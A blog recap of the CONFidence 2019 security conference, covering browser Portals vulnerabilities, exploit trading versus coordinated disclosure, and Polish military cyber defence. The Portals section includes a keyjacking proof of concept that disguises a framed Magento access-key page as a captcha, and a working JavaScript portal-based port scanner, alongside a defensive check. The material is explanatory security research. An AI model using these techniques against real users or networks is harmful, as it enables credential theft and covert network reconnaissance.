Confidence 2019: Portals, Clint Eastwood and the Polish cyber-force military
On the 3rd and 4th of June another edition of CONFidence, CONFidence 2019, took place at the Aviation Museum of Cracow. Our team member joined the event and left surprisingly contented and amazed.
What is CONFidence?
CONFidence is a cybersecurity conference that has brought together web security experts and enthusiasts since 2005. This year’s edition was hosted at the Polish Aviation Museum and over 1300 people attended. Lectures were split across three main tracks and an additional community track; the conference agenda can be found here. Besides the lectures you could take part in a treasure hunt, a game in which teams collected points by completing special tasks; at the end of the conference the team with the highest score won money and tickets for next year’s edition. If you preferred to compete in a more hands-on way, you could also join the CTF: a hacking game in which you find hidden flags by exploiting vulnerable code in many different ways, with challenges covering SQL injection, cryptography, reverse engineering and a miscellaneous category. Here is a link to the online CTF teaser.
In total 50 speakers talked about different security topics. We couldn’t attend them all, but here is a breakdown of the ones we did. Most of the lectures lasted 55 minutes.
Topic 1 - Portals
Michał Bentkowski gave a short talk about vulnerabilities in Portals. Detecting which ports are open on any host? A Same-Origin Policy bypass? Keyjacking? It had it all.
But actually… what is a portal?
Portals is an experimental HTML element, <portal>, which embeds another page much like an iframe does, but which can then be “activated” so that the embedded page becomes the top-level document without a full navigation.
How to use portals
As you can see, after activating the portal the URL in the browser is replaced by the portal’s URL and the website content is replaced with the portal’s content.
Vulnerability 1 - SOP bypass
Vulnerability 2 - Framing issues (keyjacking)
Another issue mentioned was keyjacking. The scenario presented showed how an API key could be stolen by displaying only a small part of a website inside a portal and making the user believe it is a captcha. For example:
This looks like a pretty long captcha, doesn’t it? In fact, the code looks like this:
    <html>
      <body>
        Please enter captcha: <input type="text"/>
        <!-- 400x863 px portal pulled upwards by a negative top margin, so that only
             the bottom ~14 px of the Magento access-key page stay on screen, right
             next to the fake captcha input -->
        <portal id="portal"
                style="width: 400px; height: 863px; border: 1px solid #000; margin-top: -849px;"
                src="https://marketplace.magento.com/customer/accessKeys/"/>
      </body>
    </html>
It displays one of the Magento access keys:
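A check the embedded page can make on its own side, added here as an example and not code from the talk or from the site shown above: a document hosted inside a portal sees a non-null window.portalHost, and it receives a portalactivate event once the user has promoted it to the top-level page. Rendering secrets only when the page is the top-level document, neither a portal nor a frame, defeats the strip-of-a-page trick above. The element class, the placeholder text and the DOM wiring are assumptions; whether a given browser applies X-Frame-Options or frame-ancestors to portals is something to verify separately, and this client-side check is defence in depth, not a replacement for that server-side header.

```javascript
// Added example (not code from the talk or from the site shown above).
// Assumptions: the access keys live in elements with class "access-key",
// and the page wants to hide them until it is the top-level document.

// True when `win` is a document embedded in a <portal>: such documents get a
// non-null window.portalHost (undefined or null otherwise).
function embeddedInPortal(win) {
  return Boolean(win && win.portalHost);
}

// Secrets may be rendered only for a top-level document that is neither a
// portal nor an iframe (win.top !== win for framed documents).
function secretsAllowed(win) {
  return !embeddedInPortal(win) && win.top === win;
}

// Decide what text to show for one key: the real value or a placeholder.
function renderKey(win, keyValue) {
  return secretsAllowed(win) ? keyValue : "[hidden until this page is opened directly]";
}

// Browser-only wiring; skipped when the pure functions above run under Node.
if (typeof window !== "undefined" && typeof document !== "undefined") {
  const applyPolicy = () => {
    for (const el of document.querySelectorAll(".access-key")) {
      // Keep the real value in a data attribute so it can be restored later.
      if (!el.dataset.key) el.dataset.key = el.textContent;
      el.textContent = renderKey(window, el.dataset.key);
    }
  };
  document.addEventListener("DOMContentLoaded", applyPolicy);
  // Fired on the portal's document when the user activates it and it becomes
  // the top-level page; window.portalHost is null from then on.
  window.addEventListener("portalactivate", applyPolicy);
}
```

The attacker's page cannot read the cross-origin DOM, so the value never leaving the data attribute is not the point; the point is that nothing key-shaped is painted while the page is embedded, so there is nothing to show through the 14 px strip.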
Vulnerability 3 - Port Scan
This one is a bit tricky: it uses the portal’s onload event to determine the status of any port on any host. Michał described a few possible cases that can occur when loading content into a portal:
- onload fired an even number of times (i.e. 2, 4, 6, …): the requested port is OPEN
- onload fired an odd number of times (i.e. 3, 5, 7, …): the requested port is CLOSED
- onload did not fire within 1 s: the requested port is probably FILTERED
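The three cases above, turned into a small scanner as an added example (not the code shown in the talk): classifyPort() applies the parity rule exactly as summarised, and probePort() does the browser-side work of loading http://host:port/ into a hidden portal and counting load events for one second. The host, the port list, the timeout and the sample observations are assumptions constructed for illustration.

```javascript
// Added example (not code from the talk): the portal-based port-state
// inference as the post summarises it. classifyPort() is pure and runs
// anywhere; probePort()/scanPorts() need a browser that supports <portal>.
// The host, port list and 1 s timeout are assumptions for illustration.

// Map the observed behaviour of the portal's onload handler to a port state,
// following the three cases listed above:
//   - even number of load events (2, 4, 6, ...)  -> OPEN
//   - odd number of load events (3, 5, 7, ...)   -> CLOSED
//   - no load event before the timeout           -> FILTERED
function classifyPort(loadCount, timedOut) {
  if (loadCount === 0 && timedOut) return "FILTERED";
  return loadCount % 2 === 0 ? "OPEN" : "CLOSED";
}

// Constructed observations (not real measurements) showing what a scan of
// four ports might record: how many times onload fired before the timeout.
const SAMPLE_OBSERVATIONS = [
  { port: 22,   loadCount: 3, timedOut: false },
  { port: 80,   loadCount: 2, timedOut: false },
  { port: 443,  loadCount: 4, timedOut: false },
  { port: 8080, loadCount: 0, timedOut: true  },
];

// Turn raw observations into { port: state } for reporting.
function summarize(observations) {
  const result = {};
  for (const o of observations) result[o.port] = classifyPort(o.loadCount, o.timedOut);
  return result;
}

// Browser side: load http://host:port/ into a hidden <portal>, count load
// events for timeoutMs, then remove the element. Resolves with one observation.
function probePort(host, port, timeoutMs = 1000) {
  return new Promise((resolve) => {
    const portal = document.createElement("portal");
    let loadCount = 0;
    portal.addEventListener("load", () => { loadCount += 1; });
    portal.style.display = "none";
    portal.src = `http://${host}:${port}/`;
    document.body.appendChild(portal);
    setTimeout(() => {
      portal.remove();
      resolve({ port, loadCount, timedOut: loadCount === 0 });
    }, timeoutMs);
  });
}

// Probe ports one at a time so their load events cannot be confused.
async function scanPorts(host, ports, timeoutMs = 1000) {
  const observations = [];
  for (const port of ports) observations.push(await probePort(host, port, timeoutMs));
  return summarize(observations);
}

if (typeof document !== "undefined" && typeof HTMLPortalElement !== "undefined") {
  scanPorts("127.0.0.1", [22, 80, 443, 8080]).then((s) => console.log(s));
} else {
  // No <portal> support (e.g. Node): show the classification on the sample data.
  console.log(summarize(SAMPLE_OBSERVATIONS));
}
```

The parity rule is the talk’s observation of one experimental implementation, not a documented API, so treat it as a snapshot: the number of load events depends on how the browser renders its error page for a refused or timed-out connection, and it can change between builds. Only point this at hosts you are authorised to scan.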
Topic 2 - Clint Eastwood
Udo Schneider’s talk was less technical but touched on a really important ethical issue: vulnerability trading. In the modern age of technology you can make a pretty decent living just by looking for vulnerabilities in well-known applications and reporting them back to the vendor. Large companies often run bug bounty programs through which you get paid for finding exploitable bugs. But what if there is no such program and you have found a bug in the software? There are multiple paths you can take.
A common thought people have when they find an exploitable piece of software is “I wonder how much I can get for this on the darknet”. The darknet is full of hacking tools and there are plenty of places where you could sell an exploit, but is it worth it? It turns out that investing in 0-days is very risky: an exploit can be detected right after its first use, or the bug might be patched shortly after purchase. Besides that, there is something more important to worry about: selling exploits over Tor marketplaces is illegal.
Multiple websites exist that buy exploits; the price range varies depending on the potential harm, from hundreds of dollars to millions. The companies buying exploits like this resell them to militaries and the largest corporations. This path is ugly because it works legally, yet it makes the web a much less secure place for the sake of profit.
no report to vendor = no fix = software vulnerabilities wide open to attack at any moment
Last but not least is the good path you can take when you find a vulnerability. You can report it to the vendor and, in case they bluntly say they won’t fix it, follow a coordinated disclosure policy with a deadline, the approach used by teams dedicated to security research such as Google’s Project Zero. Project Zero is a team of qualified security experts that looks for vulnerabilities in widely used software (and not only software!), reports them to the vendor and publishes the details after 90 days; if the vendor has not fixed the issue by then, the vulnerability details become public for everyone.
Topic 3 - Polish cyber-force military
The last of the talks we discuss here was given by Colonel Przemysław Przybylak of the Polish cyber-force military. He described the steps the military takes in cyberspace to make Poland a more secure country to live in. Of course the topic is broad, as modern technology brings new threats every day that need to be handled. The colonel described in general the whole process that has to be followed strictly to ensure the safety of civilians. He also mentioned the recent Israeli bombing carried out in response to a cyber-attack by hackers and, more distant in time, the 2007 cyberattacks on Estonia.
To sum up, CONFidence is a conference that is really worth attending if you work in the IT business. We will definitely join it again in 2020.